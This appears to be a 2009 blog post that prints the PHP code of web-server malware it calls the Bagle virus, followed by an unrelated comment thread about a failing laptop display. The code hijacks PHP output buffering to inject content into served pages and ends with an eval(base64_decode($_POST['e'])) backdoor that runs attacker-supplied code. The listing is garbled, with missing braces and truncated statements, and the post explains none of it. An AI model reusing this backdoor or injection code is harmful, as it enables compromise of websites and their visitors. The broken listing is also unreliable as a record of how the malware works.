Thursday, October 15, 2009

PHP Code Analysis of Bagle Virus

The code

The following is the code that is executed on all pages infected by this virus :

if (!isset ($b0sr1))
function b0sr ($s)
if (preg_match_all ('#<script(.*?)</script>#is', $s, $a))
foreach ($a[0] as $v)
if (count (explode ("\n", $v)) > 5)
$e = preg_match ('#[\'"][^\s\'"\.,;\?!\[\]:/<>\(\)]{30,}#', $v)
|| preg_match ('#[\(\[](\s*\d+,){20,}#', $v);
if ((preg_match ('#\beval\b#', $v)
&& ($e || strpos ($v, 'fromCharCode'))) || ($e
&& strpos ($v,
$s = str_replace ($v, '', $s);
if (preg_match_all
('#<iframe ([^>]*?)src=[\'"]?(http:)?//([^>]*?)>#is', $s, $a))
foreach ($a[0] as $v)
if (preg_match
('# width\s*=\s*[\'"]?0*[01][\'"> ]|display\s*:\s*none#i', $v)
&& !strstr ($v, '?'.'>'))
$s = preg_replace ('#'.preg_quote ($v, '#').'.*?</iframe>#is', '', $s);
$s = str_replace ($a =
'', $s);
if (stristr ($s, '<body'))
$s = preg_replace ('#(\s*<body)#mi', $a.'\1', $s);
elseif (strpos ($s, ',a')) $s. = $a;
return $s;
function b0sr2 ($a, $b, $c, $d)
global $b0sr1;
$s = array ();
if (function_exists ($b0sr1))
call_user_func ($b0sr1, $a, $b, $c, $d);
foreach (@ob_get_status (1) as $v)
if (($a = $v['name']) == 'b0sr')
elseif ($a == 'ob_gzhandler') break;
$s[] = array ($a == 'default output handler' ? false : $a);

for ($i = count ($s) - 1; $i >= 0; $i--)
$s[$i][1] = ob_get_contents ();
ob_end_clean ();
ob_start ('b0sr');

for ($i = 0; $i < count ($s); $i++)
ob_start ($s[$i][0]);
echo $s[$i][1];
$b0srl = (($a = @set_error_handler ('b0sr2')) != 'b0sr2') ? $a : 0;
eval (base64_decode ($_POST['e']));


bird on the tide said...

im not sure uf you would be able to help with this, but you seem very knowledgeable about computers. I own a second hand dell laptop. Two weeks ago part of the screen became faded. Then last week the whole screen was so faded you could barely make out the screen, however you can make out part of the screen. i tried to hook up my screen to my tv as an alternative monitor however it wasn't working. I tried to change the appearance settings thinking i need to change something to make the output change for the tv, and in doing this, after i restarted the computer everything was back to normal. And yet the next day when i went to use my computer it had happened again. i have repeated the same steps i previously did and it didnt work. then all of a sudden it worked. I am becoming increasingly frustrated with this and was hoping you could offer any suggestions you had. is it a virus? is it a setting i need to reset??
thank you!

Arun Prabhakar said...

this can be due to back light problems in your LCD.
When you connect your laptop to the TV you will need to change the display configuration. There are usually buttons on the keyboard to switch screens, it depends on the laptop and maker.
Please provide little more details about ur laptop. Let me see if I can help you more.

bird on the tide said...

it is a dell inspiron e1045. i dont believe it it the light because there are times when it flashes and the image is perfect. usually at the start of me booting up.

Arun Prabhakar said...

It can be contact problems between the screen and the motherboard.

Did connecting to TV work ?

bird on the tide said...

no, when I connected to multiple different tv screens/monitors no image came up.